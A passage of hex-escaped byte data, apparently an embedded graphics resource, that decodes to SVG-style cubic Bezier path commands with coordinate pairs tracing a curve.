\x20\x31\x35\x2e\x33\x33\x31\x35\x36\x30\x38\x33\x32\x20\x43\x20\
\x31\x30\x2e\x31\x38\x37\x34\x39\x34\x37\x30\x37\x20\x31\x35\x2e\
\x33\x33\x37\x30\x38\x33\x39\x37\x35\x32\x20\x31\x30\x2e\x31\x39\
\x33\x37\x33\x35\x37\x37\x35\x39\x20\x31\x35\x2e\x33\x34\x31\x37\
\x38\x35\x30\x39\x35\x36\x20\x31\x30\x2e\x31\x39\x39\x39\x37\x36\
\x38\x34\x34\x37\x20\x31\x35\x2e\x33\x34\x35\x36\x36\x35\x34\x38\
\x36\x32\x20\x43\x20\x31\x30\x2e\x32\x30\x36\x32\x31\x37\x39\x31\
\x33\x35\x20\x31\x35\x2e\x33\x34\x39\x35\x34\x35\x38\x37\x36\x39\
\x20\x31\x30\x2e\x32\x31\x32\x34\x35\x38\x39\x38\x32\x34\x20\x31\
\x35\x2e\x33\x35\x32\x36\x30\x30\x36\x30\x30\x33\x20\x31\x30\x2e\
\x32\x31\x38\x37\x30\x30\x30\x35\x31\x32\x20\x31\x35\x2e\x33\x35\
\x34\x38\x33\x32\x32\x34\x30\x31\x20\x43\x20\x31\x30\x2e\x32\x32\
\x34\x39\x34\x31\x31\x32\x30\x31\x20\x31\x35\x2e\x33\x35\x37\x30\
\x36\x33\x38\x37\x39\x38\x20\x31\x30\x2e\x32\x33\x31\x31\x38\x32\
\x31\x38\x38\x39\x20\x31\x35\x2e\x33\x35\x38\x34\x36\x37\x34\x38\
\x34\x33\x20\x31\x30\x2e\x32\x33\x37\x34\x32\x33\x32\x35\x37\x37\
\x20\x31\x35\x2e\x33\x35\x39\x30\x34\x36\x39\x32\x33\x35\x20\x43\
\x20\x31\x30\x2e\x32\x34\x33\x36\x36\x34\x33\x32\x36\x36\x20\x31\
\x35\x2e\x33\x35\x39\x36\x32\x36\x33\x36\x32\x38\x20\x31\x30\x2e\
\x32\x34\x39\x39\x30\x35\x33\x39\x35\x34\x20\x31\x35\x2e\x33\x35\
\x39\x33\x37\x36\x36\x37\x38\x37\x20\x31\x30\x2e\x32\x35\x36\x31\
\x34\x36\x34\x36\x34\x32\x20\x31\x35\x2e\x33\x35\x38\x33\x30\x33\
\x30\x32\x31\x37\x20\x43\x20\x31\x30\x2e\x32\x36\x32\x33\x38\x37\
\x35\x33\x33\x31\x20\x31\x35\x2e\x33\x35\x37\x32\x32\x39\x33\x36\
\x34\x37\x20\x31\x30\x2e\x32\x36\x38\x36\x32\x38\x36\x30\x31\x39\
\x20\x31\x35\x2e\x33\x35\x35\x33\x32\x36\x37\x37\x38\x20\x31\x30\
\x2e\x32\x37\x34\x38\x36\x39\x36\x37\x30\x37\x20\x31\x35\x2e\x33\
\x35\x32\x36\x30\x31\x36\x38\x34\x34\x20\x43\x20\x31\x30\x2e\x32\
\x38\x31\x31\x31\x30\x37\x33\x39\x36\x20\x31\x35\x2e\x33\x34\x39\
\x38\x37\x36\x35\x39\x30\x38\x20\x31\x30\x2e\x32\x38\x37\x33\x35\
\x31\x38\x30\x38\x34\x20\x31\x35\x2e\x33\x34\x36\x33\x32\x34\x30\
\x34\x32\x36\x20\x31\x30\x2e\x32\x39\x33\x35\x39\x32\x38\x37\x37\
\x32\x20\x31\x35\x2e\x33\x34\x31\x39\x35\x31\x37\x32\x34\x38\x20\
\x43\x20\x31\x30\x2e\x32\x39\x39\x38\x33\x33\x39\x34\x36\x31\x20\
\x31\x35\x2e\x33\x33\x37\x35\x37\x39\x34\x30\x37\x31\x20\x31\x30\
\x2e\x33\x30\x36\x30\x37\x35\x30\x31\x34\x39\x20\x31\x35\x2e\x33\
\x33\x32\x33\x38\x32\x33\x38\x38\x37\x20\x31\x30\x2e\x33\x31\x32\
\x33\x31\x36\x30\x38\x33\x38\x20\x31\x35\x2e\x33\x32\x36\x33\x36\
\x39\x36\x30\x35\x34\x20\x43\x20\x31\x30\x2e\x33\x31\x38\x35\x35\
\x37\x31\x35\x32\x36\x20\x31\x35\x2e\x33\x32\x30\x33\x35\x36\x38\
\x32\x32\x32\x20\x31\x30\x2e\x33\x32\x34\x37\x39\x38\x32\x32\x31\
\x34\x20\x31\x35\x2e\x33\x31\x33\x35\x32\x33\x33\x36\x37\x32\x20\
\x31\x30\x2e\x33\x33\x31\x30\x33\x39\x32\x39\x30\x33\x20\x31\x35\
\x2e\x33\x30\x35\x38\x37\x39\x34\x31\x32\x39\x20\x43\x20\x31\x30\
\x2e\x33\x33\x37\x32\x38\x30\x33\x35\x39\x31\x20\x31\x35\x2e\x32\
\x39\x38\x32\x33\x35\x34\x35\x38\x37\x20\x31\x30\x2e\x33\x34\x33\
\x35\x32\x31\x34\x32\x37\x39\x20\x31\x35\x2e\x32\x38\x39\x37\x37\
\x36\x31\x33\x30\x31\x20\x31\x30\x2e\x33\x34\x39\x37\x36\x32\x34\
\x39\x36\x38\x20\x31\x35\x2e\x32\x38\x30\x35\x31\x32\x38\x32\x30\
\x39\x20\x43\x20\x31\x30\x2e\x33\x35\x36\x30\x30\x33\x35\x36\x35\
\x36\x20\x31\x35\x2e\x32\x37\x31\x32\x34\x39\x35\x31\x31\x36\x20\
\x31\x30\x2e\x33\x36\x32\x32\x34\x34\x36\x33\x34\x34\x20\x31\x35\
\x2e\x32\x36\x31\x31\x37\x37\x33\x38\x35\x38\x20\x31\x30\x2e\x33\
\x36\x38\x34\x38\x35\x37\x30\x33\x33\x20\x31\x35\x2e\x32\x35\x30\
\x33\x30\x39\x30\x34\x30\x36\x20\x43\x20\x31\x30\x2e\x33\x37\x34\
\x37\x32\x36\x37\x37\x32\x31\x20\x31\x35\x2e\x32\x33\x39\x34\x34\
\x30\x36\x39\x35\x34\x20\x31\x30\x2e\x33\x38\x30\x39\x36\x37\x38\
\x34\x31\x20\x31\x35\x2e\x32\x32\x37\x37\x37\x31\x33\x34\x31\x38\
\x20\x31\x30\x2e\x33\x38\x37\x32\x30\x38\x39\x30\x39\x38\x20\x31\
\x35\x2e\x32\x31\x35\x33\x31\x34\x37\x36\x30\x39\x20\x43\x20\x31\
\x30\x2e\x33\x39\x33\x34\x34\x39\x39\x37\x38\x36\x20\x31\x35\x2e\
\x32\x30\x32\x38\x35\x38\x31\x37\x39\x39\x20\x31\x30\x2e\x33\x39\
\x39\x36\x39\x31\x30\x34\x37\x35\x20\x31\x35\x2e\x31\x38\x39\x36\
\x30\x39\x36\x33\x36\x39\x20\x31\x30\x2e\x34\x30\x35\x39\x33\x32\
\x31\x31\x36\x33\x20\x31\x35\x2e\x31\x37\x35\x35\x38\x34\x30\x37\
\x35\x34\x20\x43\x20\x31\x30\x2e\x34\x31\x32\x31\x37\x33\x31\x38\
\x35\x31\x20\x31\x35\x2e\x31\x36\x31\x35\x35\x38\x35\x31\x34\x20\
\x31\x30\x2e\x34\x31\x38\x34\x31\x34\x32\x35\x34\x20\x31\x35\x2e\
\x31\x34\x36\x37\x35\x31\x32\x36\x30\x39\x20\x31\x30\x2e\x34\x32\
\x34\x36\x35\x35\x33\x32\x32\x38\x20\x31\x35\x2e\x31\x33\x31\x31\
\x37\x38\x33\x39\x39\x35\x20\x43\x20\x31\x30\x2e\x34\x33\x30\x38\
\x39\x36\x33\x39\x31\x36\x20\x31\x35\x2e\x31\x31\x35\x36\x30\x35\
\x35\x33\x38\x31\x20\x31\x30\x2e\x34\x33\x37\x31\x33\x37\x34\x36\
\x30\x35\x20\x31\x35\x2e\x30\x39\x39\x32\x36\x32\x34\x36\x33\x38\
\x20\x31\x30\x2e\x34\x34\x33\x33\x37\x38\x35\x32\x39\x33\x20\x31\
\x35\x2e\x30\x38\x32\x31\x36\x36\x33\x37\x34\x38\x20\x43\x20\x31\
\x30\x2e\x34\x34\x39\x36\x31\x39\x35\x39\x38\x31\x20\x31\x35\x2e\
\x30\x36\x35\x30\x37\x30\x32\x38\x35\x39\x20\x31\x30\x2e\x34\x35\
\x35\x38\x36\x30\x36\x36\x37\x20\x31\x35\x2e\x30\x34\x37\x32\x31\
\x36\x36\x35\x33\x34\x20\x31\x30\x2e\x34\x36\x32\x31\x30\x31\x37\
\x33\x35\x38\x20\x31\x35\x2e\x30\x32\x38\x36\x32\x33\x37\x36\x33\
\x38\x20\x43\x20\x31\x30\x2e\x34\x36\x38\x33\x34\x32\x38\x30\x34\
\x37\x20\x31\x35\x2e\x30\x31\x30\x30\x33\x30\x38\x37\x34\x32\x20\
\x31\x30\x2e\x34\x37\x34\x35\x38\x33\x38\x37\x33\x35\x20\x31\x34\
\x2e\x39\x39\x30\x36\x39\x34\x32\x38\x31\x36\x20\x31\x30\x2e\x34\
\x38\x30\x38\x32\x34\x39\x34\x32\x33\x20\x31\x34\x2e\x39\x37\x30\
\x36\x33\x33\x33\x33\x32\x20\x43\x20\x31\x30\x2e\x34\x38\x37\x30\
\x36\x36\x30\x31\x31\x32\x20\x31\x34\x2e\x39\x35\x30\x35\x37\x32\
\x33\x38\x32\x34\x20\x31\x30\x2e\x34\x39\x33\x33\x30\x37\x30\x38\
\x20\x31\x34\x2e\x39\x32\x39\x37\x38\x32\x37\x31\x39\x38\x20\x31\
\x30\x2e\x34\x39\x39\x35\x34\x38\x31\x34\x38\x38\x20\x31\x34\x2e\
\x39\x30\x38\x32\x38\x34\x37\x32\x30\x33\x20\x43\x20\x31\x30\x2e\
\x35\x30\x35\x37\x38\x39\x32\x31\x37\x37\x20\x31\x34\x2e\x38\x38\
\x36\x37\x38\x36\x37\x32\x30\x37\x20\x31\x30\x2e\x35\x31\x32\x30\
\x33\x30\x32\x38\x36\x35\x20\x31\x34\x2e\x38\x36\x34\x35\x37\x36\
\x31\x32\x34\x37\x20\x31\x30\x2e\x35\x31\x38\x32\x37\x31\x33\x35\
\x35\x33\x20\x31\x34\x2e\x38\x34\x31\x36\x37\x34\x33\x30\x36\x35\
\x20\x43\x20\x31\x30\x2e\x35\x32\x34\x35\x31\x32\x34\x32\x34\x32\
\x20\x31\x34\x2e\x38\x31\x38\x37\x37\x32\x34\x38\x38\x34\x20\x31\
\x30\x2e\x35\x33\x30\x37\x35\x33\x34\x39\x33\x20\x31\x34\x2e\x37\
\x39\x35\x31\x37\x35\x32\x39\x31\x37\x20\x31\x30\x2e\x35\x33\x36\
\x39\x39\x34\x35\x36\x31\x39\x20\x31\x34\x2e\x37\x37\x30\x39\x30\
\x35\x30\x35\x36\x34\x20\x43\x20\x31\x30\x2e\x35\x34\x33\x32\x33\
\x35\x36\x33\x30\x37\x20\x31\x34\x2e\x37\x34\x36\x36\x33\x34\x38\
\x32\x31\x31\x20\x31\x30\x2e\x35\x34\x39\x34\x37\x36\x36\x39\x39\
\x35\x20\x31\x34\x2e\x37\x32\x31\x36\x38\x37\x35\x30\x30\x31\x20\
\x31\x30\x2e\x35\x35\x35\x37\x31\x37\x37\x36\x38\x34\x20\x31\x34\
\x2e\x36\x39\x36\x30\x38\x36\x33\x36\x34\x32\x20\x43\x20\x31\x30\
\x2e\x35\x36\x31\x39\x35\x38\x38\x33\x37\x32\x20\x31\x34\x2e\x36\
\x37\x30\x34\x38\x35\x32\x32\x38\x33\x20\x31\x30\x2e\x35\x36\x38\
\x31\x39\x39\x39\x30\x36\x20\x31\x34\x2e\x36\x34\x34\x32\x32\x36\
\x33\x34\x36\x33\x20\x31\x30\x2e\x35\x37\x34\x34\x34\x30\x39\x37\
\x34\x39\x20\x31\x34\x2e\x36\x31\x37\x33\x33\x33\x38\x38\x33\x39\
\x20\x43\x20\x31\x30\x2e\x35\x38\x30\x36\x38\x32\x30\x34\x33\x37\
\x20\x31\x34\x2e\x35\x39\x30\x34\x34\x31\x34\x32\x31\x34\x20\x31\
\x30\x2e\x35\x38\x36\x39\x32\x33\x31\x31\x32\x35\x20\x31\x34\x2e\
\x35\x36\x32\x39\x31\x31\x35\x36\x39\x20\x31\x30\x2e\x35\x39\x33\
\x31\x36\x34\x31\x38\x31\x34\x20\x31\x34\x2e\x35\x33\x34\x37\x36\
\x39\x33\x35\x30\x31\x20\x43\x20\x31\x30\x2e\x35\x39\x39\x34\x30\
\x35\x32\x35\x30\x32\x20\x31\x34\x2e\x35\x30\x36\x36\x32\x37\x31\
\x33\x31\x31\x20\x31\x30\x2e\x36\x30\x35\x36\x34\x36\x33\x31\x39\
\x20\x31\x34\x2e\x34\x37\x37\x38\x36\x38\x38\x36\x33\x38\x20\x31\
\x30\x2e\x36\x31\x31\x38\x38\x37\x33\x38\x37\x39\x20\x31\x34\x2e\
\x34\x34\x38\x35\x32\x30\x33\x39\x30\x33\x20\x43\x20\x31\x30\x2e\
\x36\x31\x38\x31\x32\x38\x34\x35\x36\x37\x20\x31\x34\x2e\x34\x31\
\x39\x31\x37\x31\x39\x31\x36\x37\x20\x31\x30\x2e\x36\x32\x34\x33\
\x36\x39\x35\x32\x35\x36\x20\x31\x34\x2e\x33\x38\x39\x32\x32\x39\
\x36\x38\x38\x36\x20\x31\x30\x2e\x36\x33\x30\x36\x31\x30\x35\x39\
\x34\x34\x20\x31\x34\x2e\x33\x35\x38\x37\x32\x30\x33\x32\x37\x31\
\x20\x43\x20\x31\x30\x2e\x36\x33\x36\x38\x35\x31\x36\x36\x33\x32\
\x20\x31\x34\x2e\x33\x32\x38\x32\x31\x30\x39\x36\x35\x35\x20\x31\
\x30\x2e\x36\x34\x33\x30\x39\x32\x37\x33\x32\x31\x20\x31\x34\x2e\
\x32\x39\x37\x31\x33\x31\x30\x36\x31\x20\x31\x30\x2e\x36\x34\x39\
\x33\x33\x33\x38\x30\x30\x39\x20\x31\x34\x2e\x32\x36\x35\x35\x30\
\x37\x39\x37\x32\x34\x20\x43\x20\x31\x30\x2e\x36\x35\x35\x35\x37\
\x34\x38\x36\x39\x37\x20\x31\x34\x2e\x32\x33\x33\x38\x38\x34\x38\
\x38\x33\x39\x20\x31\x30\x2e\x36\x36\x31\x38\x31\x35\x39\x33\x38\
\x36\x20\x31\x34\x2e\x32\x30\x31\x37\x31\x35\x33\x34\x36\x20\x31\
\x30\x2e\x36\x36\x38\x30\x35\x37\x30\x30\x37\x34\x20\x31\x34\x2e\
\x31\x36\x39\x30\x32\x37\x34\x31\x33\x31\x20\x43\x20\x31\x30\x2e\
\x36\x37\x34\x32\x39\x38\x30\x37\x36\x32\x20\x31\x34\x2e\x31\x33\
\x36\x33\x33\x39\x34\x38\x30\x32\x20\x31\x30\x2e\x36\x38\x30\x35\
\x33\x39\x31\x34\x35\x31\x20\x31\x34\x2e\x31\x30\x33\x31\x33\x30\
\x30\x33\x36\x31\x20\x31\x30\x2e\x36\x38\x36\x37\x38\x30\x32\x31\
\x33\x39\x20\x31\x34\x2e\x30\x36\x39\x34\x32\x37\x37\x38\x37\x35\
\x20\x43\x20\x31\x30\x2e\x36\x39\x33\x30\x32\x31\x32\x38\x32\x38\
\x20\x31\x34\x2e\x30\x33\x35\x37\x32\x35\x35\x33\x38\x39\x20\x31\
\x30\x2e\x36\x39\x39\x32\x36\x32\x33\x35\x31\x36\x20\x31\x34\x2e\
\x30\x30\x31\x35\x32\x37\x35\x32\x33\x36\x20\x31\x30\x2e\x37\x30\
\x35\x35\x30\x33\x34\x32\x30\x34\x20\x31\x33\x2e\x39\x36\x36\x38\
\x36\x33\x30\x35\x35\x38\x20\x43\x20\x31\x30\x2e\x37\x31\x31\x37\
\x34\x34\x34\x38\x39\x33\x20\x31\x33\x2e\x39\x33\x32\x31\x39\x38\
\x35\x38\x38\x20\x31\x30\x2e\x37\x31\x37\x39\x38\x35\x35\x35\x38\
\x31\x20\x31\x33\x2e\x38\x39\x37\x30\x36\x34\x38\x36\x34\x33\x20\
\x31\x30\x2e\x37\x32\x34\x32\x32\x36\x36\x32\x36\x39\x20\x31\x33\
\x2e\x38\x36\x31\x34\x39\x31\x37\x36\x31\x34\x20\x43\x20\x31\x30\
\x2e\x37\x33\x30\x34\x36\x37\x36\x39\x35\x38\x20\x31\x33\x2e\x38\
\x32\x35\x39\x31\x38\x36\x35\x38\x34\x20\x31\x30\x2e\x37\x33\x36\
\x37\x30\x38\x37\x36\x34\x36\x20\x31\x33\x2e\x37\x38\x39\x39\x30\
\x33\x35\x33\x35\x37\x20\x31\x30\x2e\x37\x34\x32\x39\x34\x39\x38\
\x33\x33\x34\x20\x31\x33\x2e\x37\x35\x33\x34\x37\x36\x37\x38\x36\
\x20\x43\x20\x31\x30\x2e\x37\x34\x39\x31\x39\x30\x39\x30\x32\x33\
\x20\x31\x33\x2e\x37\x31\x37\x30\x35\x30\x30\x33\x36\x34\x20\x31\
\x30\x2e\x37\x35\x35\x34\x33\x31\x39\x37\x31\x31\x20\x31\x33\x2e\
\x36\x38\x30\x32\x30\x39\x31\x38\x36\x34\x20\x31\x30\x2e\x37\x36\
\x31\x36\x37\x33\x30\x33\x39\x39\x20\x31\x33\x2e\x36\x34\x32\x39\
\x38\x35\x30\x39\x38\x31\x20\x43\x20\x31\x30\x2e\x37\x36\x37\x39\
\x31\x34\x31\x30\x38\x38\x20\x31\x33\x2e\x36\x30\x35\x37\x36\x31\
\x30\x30\x39\x39\x20\x31\x30\x2e\x37\x37\x34\x31\x35\x35\x31\x37\
\x37\x36\x20\x31\x33\x2e\x35\x36\x38\x31\x35\x31\x33\x38\x30\x38\
\x20\x31\x30\x2e\x37\x38\x30\x33\x39\x36\x32\x34\x36\x35\x20\x31\
\x33\x2e\x35\x33\x30\x31\x38\x37\x34\x39\x34\x35\x20\x43\x20\x31\
\x30\x2e\x37\x38\x36\x36\x33\x37\x33\x31\x35\x33\x20\x31\x33\x2e\
\x34\x39\x32\x32\x32\x33\x36\x30\x38\x33\x20\x31\x30\x2e\x37\x39\
\x32\x38\x37\x38\x33\x38\x34\x31\x20\x31\x33\x2e\x34\x35\x33\x39\
\x30\x33\x33\x33\x36\x36\x20\x31\x30\x2e\x37\x39\x39\x31\x31\x39\
\x34\x35\x33\x20\x31\x33\x2e\x34\x31\x35\x32\x35\x38\x33\x33\x36\
\x35\x20\x43\x20\x31\x30\x2e\x38\x30\x35\x33\x36\x30\x35\x32\x31\
\x38\x20\x31\x33\x2e\x33\x37\x36\x36\x31\x33\x33\x33\x36\x34\x20\
\x31\x30\x2e\x38\x31\x31\x36\x30\x31\x35\x39\x30\x36\x20\x31\x33\
\x2e\x33\x33\x37\x36\x34\x31\x36\x35\x37\x33\x20\x31\x30\x2e\x38\
\x31\x37\x38\x34\x32\x36\x35\x39\x35\x20\x31\x33\x2e\x32\x39\x38\
\x33\x37\x35\x32\x38\x30\x33\x20\x43\x20\x31\x30\x2e\x38\x32\x34\
\x30\x38\x33\x37\x32\x38\x33\x20\x31\x33\x2e\x32\x35\x39\x31\x30\
\x38\x39\x30\x33\x34\x20\x31\x30\x2e\x38\x33\x30\x33\x32\x34\x37\
\x39\x37\x31\x20\x31\x33\x2e\x32\x31\x39\x35\x34\x36\x30\x35\x38\
\x38\x20\x31\x30\x2e\x38\x33\x36\x35\x36\x35\x38\x36\x36\x20\x31\
\x33\x2e\x31\x37\x39\x37\x31\x39\x30\x30\x32\x35\x20\x43\x20\x31\
\x30\x2e\x38\x34\x32\x38\x30\x36\x39\x33\x34\x38\x20\x31\x33\x2e\
\x31\x33\x39\x38\x39\x31\x39\x34\x36\x33\x20\x31\x30\x2e\x38\x34\
\x39\x30\x34\x38\x30\x30\x33\x37\x20\x31\x33\x2e\x30\x39\x39\x37\
\x39\x39\x30\x39\x32\x20\x31\x30\x2e\x38\x35\x35\x32\x38\x39\x30\
\x37\x32\x35\x20\x31\x33\x2e\x30\x35\x39\x34\x37\x32\x39\x32\x30\
\x37\x20\x43\x20\x31\x30\x2e\x38\x36\x31\x35\x33\x30\x31\x34\x31\
\x33\x20\x31\x33\x2e\x30\x31\x39\x31\x34\x36\x37\x34\x39\x34\x20\
\x31\x30\x2e\x38\x36\x37\x37\x37\x31\x32\x31\x30\x32\x20\x31\x32\
\x2e\x39\x37\x38\x35\x38\x35\x38\x36\x30\x35\x20\x31\x30\x2e\x38\
\x37\x34\x30\x31\x32\x32\x37\x39\x20\x31\x32\x2e\x39\x33\x37\x38\
\x32\x32\x39\x30\x39\x39\x20\x43\x20\x31\x30\x2e\x38\x38\x30\x32\
\x35\x33\x33\x34\x37\x38\x20\x31\x32\x2e\x38\x39\x37\x30\x35\x39\
\x39\x35\x39\x33\x20\x31\x30\x2e\x38\x38\x36\x34\x39\x34\x34\x31\
\x36\x37\x20\x31\x32\x2e\x38\x35\x36\x30\x39\x33\x37\x33\x34\x34\
\x20\x31\x30\x2e\x38\x39\x32\x37\x33\x35\x34\x38\x35\x35\x20\x31\
\x32\x2e\x38\x31\x34\x39\x35\x37\x30\x31\x35\x34\x20\x43\x20\x31\
\x30\x2e\x38\x39\x38\x39\x37\x36\x35\x35\x34\x33\x20\x31\x32\x2e\
\x37\x37\x33\x38\x32\x30\x32\x39\x36\x34\x20\x31\x30\x2e\x39\x30\
\x35\x32\x31\x37\x36\x32\x33\x32\x20\x31\x32\x2e\x37\x33\x32\x35\
\x31\x32\x30\x36\x30\x37\x20\x31\x30\x2e\x39\x31\x31\x34\x35\x38\
\x36\x39\x32\x20\x31\x32\x2e\x36\x39\x31\x30\x36\x35\x31\x36\x32\
\x20\x43\x20\x31\x30\x2e\x39\x31\x37\x36\x39\x39\x37\x36\x30\x39\
\x20\x31\x32\x2e\x36\x34\x39\x36\x31\x38\x32\x36\x33\x33\x20\x31\
\x30\x2e\x39\x32\x33\x39\x34\x30\x38\x32\x39\x37\x20\x31\x32\x2e\
\x36\x30\x38\x30\x33\x31\x38\x37\x30\x35\x20\x31\x30\x2e\x39\x33\
\x30\x31\x38\x31\x38\x39\x38\x35\x20\x31\x32\x2e\x35\x36\x36\x33\
\x33\x38\x38\x36\x30\x33\x20\x43\x20\x31\x30\x2e\x39\x33\x36\x34\
\x32\x32\x39\x36\x37\x34\x20\x31\x32\x2e\x35\x32\x34\x36\x34\x35\
\x38\x35\x30\x31\x20\x31\x30\x2e\x39\x34\x32\x36\x36\x34\x30\x33\
\x36\x32\x20\x31\x32\x2e\x34\x38\x32\x38\x34\x35\x35\x38\x34\x31\
\x20\x31\x30\x2e\x39\x34\x38\x39\x30\x35\x31\x30\x35\x20\x31\x32\
\x2e\x34\x34\x30\x39\x37\x30\x39\x31\x30\x39\x20\x43\x20\x31\x30\
\x2e\x39\x35\x35\x31\x34\x36\x31\x37\x33\x39\x20\x31\x32\x2e\x33\
\x39\x39\x30\x39\x36\x32\x33\x37\x37\x20\x31\x30\x2e\x39\x36\x31\
\x33\x38\x37\x32\x34\x32\x37\x20\x31\x32\x2e\x33\x35\x37\x31\x34\
\x36\x37\x31\x32\x39\x20\x31\x30\x2e\x39\x36\x37\x36\x32\x38\x33\
\x31\x31\x35\x20\x31\x32\x2e\x33\x31\x35\x31\x35\x35\x31\x30\x36\
\x32\x20\x43\x20\x31\x30\x2e\x39\x37\x33\x38\x36\x39\x33\x38\x30\
\x34\x20\x31\x32\x2e\x32\x37\x33\x31\x36\x33\x34\x39\x39\x35\x20\
\x31\x30\x2e\x39\x38\x30\x31\x31\x30\x34\x34\x39\x32\x20\x31\x32\
\x2e\x32\x33\x31\x31\x32\x39\x35\x36\x30\x39\x20\x31\x30\x2e\x39\
\x38\x36\x33\x35\x31\x35\x31\x38\x20\x31\x32\x2e\x31\x38\x39\x30\
\x38\x35\x39\x33\x30\x39\x20\x43\x20\x31\x30\x2e\x39\x39\x32\x35\
\x39\x32\x35\x38\x36\x39\x20\x31\x32\x2e\x31\x34\x37\x30\x34\x32\
\x33\x30\x30\x39\x20\x31\x30\x2e\x39\x39\x38\x38\x33\x33\x36\x35\
\x35\x37\x20\x31\x32\x2e\x31\x30\x34\x39\x38\x38\x39\x32\x34\x31\
\x20\x31\x31\x2e\x30\x30\x35\x30\x37\x34\x37\x32\x34\x36\x20\x31\
\x32\x2e\x30\x36\x32\x39\x35\x38\x32\x36\x31\x33\x20\x43\x20\x31\
\x31\x2e\x30\x31\x31\x33\x31\x35\x37\x39\x33\x34\x20\x31\x32\x2e\
\x30\x32\x30\x39\x32\x37\x35\x39\x38\x35\x20\x31\x31\x2e\x30\x31\
\x37\x35\x35\x36\x38\x36\x32\x32\x20\x31\x31\x2e\x39\x37\x38\x39\
\x31\x39\x37\x38\x39\x33\x20\x31\x31\x2e\x30\x32\x33\x37\x39\x37\
\x39\x33\x31\x31\x20\x31\x31\x2e\x39\x33\x36\x39\x36\x37\x30\x36\
\x34\x33\x20\x43\x20\x31\x31\x2e\x30\x33\x30\x30\x33\x38\x39\x39\
\x39\x39\x20\x31\x31\x2e\x38\x39\x35\x30\x31\x34\x33\x33\x39\x32\
\x20\x31\x31\x2e\x30\x33\x36\x32\x38\x30\x30\x36\x38\x37\x20\x31\
\x31\x2e\x38\x35\x33\x31\x31\x37\x30\x33\x32\x38\x20\x31\x31\x2e\
\x30\x34\x32\x35\x32\x31\x31\x33\x37\x36\x20\x31\x31\x2e\x38\x31\
\x31\x33\x30\x37\x30\x39\x35\x36\x20\x43\x20\x31\x31\x2e\x30\x34\
\x38\x37\x36\x32\x32\x30\x36\x34\x20\x31\x31\x2e\x37\x36\x39\x34\
\x39\x37\x31\x35\x38\x34\x20\x31\x31\x2e\x30\x35\x35\x30\x30\x33\
\x32\x37\x35\x32\x20\x31\x31\x2e\x37\x32\x37\x37\x37\x35\x31\x31\
\x39\x31\x20\x31\x31\x2e\x30\x36\x31\x32\x34\x34\x33\x34\x34\x31\
\x20\x31\x31\x2e\x36\x38\x36\x31\x37\x32\x35\x39\x39\x20\x43\x20\
\x31\x31\x2e\x30\x36\x37\x34\x38\x35\x34\x31\x32\x39\x20\x31\x31\
\x2e\x36\x34\x34\x35\x37\x30\x30\x37\x39\x20\x31\x31\x2e\x30\x37\
\x33\x37\x32\x36\x34\x38\x31\x38\x20\x31\x31\x2e\x36\x30\x33\x30\
\x38\x37\x38\x30\x30\x33\x20\x31\x31\x2e\x30\x37\x39\x39\x36\x37\
\x35\x35\x30\x36\x20\x31\x31\x2e\x35\x36\x31\x37\x35\x37\x30\x30\
\x36\x31\x20\x43\x20\x31\x31\x2e\x30\x38\x36\x32\x30\x38\x36\x31\
\x39\x34\x20\x31\x31\x2e\x35\x32\x30\x34\x32\x36\x32\x31\x32\x20\
\x31\x31\x2e\x30\x39\x32\x34\x34\x39\x36\x38\x38\x33\x20\x31\x31\
\x2e\x34\x37\x39\x32\x34\x37\x38\x31\x36\x38\x20\x31\x31\x2e\x30\
\x39\x38\x36\x39\x30\x37\x35\x37\x31\x20\x31\x31\x2e\x34\x33\x38\
\x32\x35\x32\x36\x33\x37\x32\x20\x43\x20\x31\x31\x2e\x31\x30\x34\
\x39\x33\x31\x38\x32\x35\x39\x20\x31\x31\x2e\x33\x39\x37\x32\x35\
\x37\x34\x35\x37\x37\x20\x31\x31\x2e\x31\x31\x31\x31\x37\x32\x38\
\x39\x34\x38\x20\x31\x31\x2e\x33\x35\x36\x34\x34\x36\x35\x39\x39\
\x20\x31\x31\x2e\x31\x31\x37\x34\x31\x33\x39\x36\x33\x36\x20\x31\
\x31\x2e\x33\x31\x35\x38\x35\x30\x34\x30\x33\x39\x20\x43\x20\x31\
\x31\x2e\x31\x32\x33\x36\x35\x35\x30\x33\x32\x34\x20\x31\x31\x2e\
\x32\x37\x35\x32\x35\x34\x32\x30\x38\x39\x20\x31\x31\x2e\x31\x32\
\x39\x38\x39\x36\x31\x30\x31\x33\x20\x31\x31\x2e\x32\x33\x34\x38\
\x37\x33\x39\x37\x31\x38\x20\x31\x31\x2e\x31\x33\x36\x31\x33\x37\
\x31\x37\x30\x31\x20\x31\x31\x2e\x31\x39\x34\x37\x33\x39\x35\x31\
\x34\x34\x20\x43\x20\x31\x31\x2e\x31\x34\x32\x33\x37\x38\x32\x33\
\x38\x39\x20\x31\x31\x2e\x31\x35\x34\x36\x30\x35\x30\x35\x36\x39\
\x20\x31\x31\x2e\x31\x34\x38\x36\x31\x39\x33\x30\x37\x38\x20\x31\
\x31\x2e\x31\x31\x34\x37\x31\x37\x38\x36\x30\x37\x20\x31\x31\x2e\
\x31\x35\x34\x38\x36\x30\x33\x37\x36\x36\x20\x31\x31\x2e\x30\x37\
\x35\x31\x30\x37\x31\x38\x30\x34\x20\x43\x20\x31\x31\x2e\x31\x36\
\x31\x31\x30\x31\x34\x34\x35\x35\x20\x31\x31\x2e\x30\x33\x35\x34\
\x39\x36\x35\x20\x31\x31\x2e\x31\x36\x37\x33\x34\x32\x35\x31\x34\
\x33\x20\x31\x30\x2e\x39\x39\x36\x31\x36\x34\x30\x30\x31\x38\x20\
\x31\x31\x2e\x31\x37\x33\x35\x38\x33\x35\x38\x33\x31\x20\x31\x30\
\x2e\x39\x35\x37\x31\x33\x38\x33\x32\x38\x33\x20\x43\x20\x31\x31\
\x2e\x31\x37\x39\x38\x32\x34\x36\x35\x32\x20\x31\x30\x2e\x39\x31\
\x38\x31\x31\x32\x36\x35\x34\x37\x20\x31\x31\x2e\x31\x38\x36\x30\
\x36\x35\x37\x32\x30\x38\x20\x31\x30\x2e\x38\x37\x39\x33\x39\x35\
\x36\x35\x34\x34\x20\x31\x31\x2e\x31\x39\x32\x33\x30\x36\x37\x38\
\x39\x36\x20\x31\x30\x2e\x38\x34\x31\x30\x31\x35\x33\x31\x33\x31\
\x20\x43\x20\x31\x31\x2e\x31\x39\x38\x35\x34\x37\x38\x35\x38\x35\
\x20\x31\x30\x2e\x38\x30\x32\x36\x33\x34\x39\x37\x31\x38\x20\x31\
\x31\x2e\x32\x30\x34\x37\x38\x38\x39\x32\x37\x33\x20\x31\x30\x2e\
\x37\x36\x34\x35\x39\x33\x33\x31\x37\x36\x20\x31\x31\x2e\x32\x31\
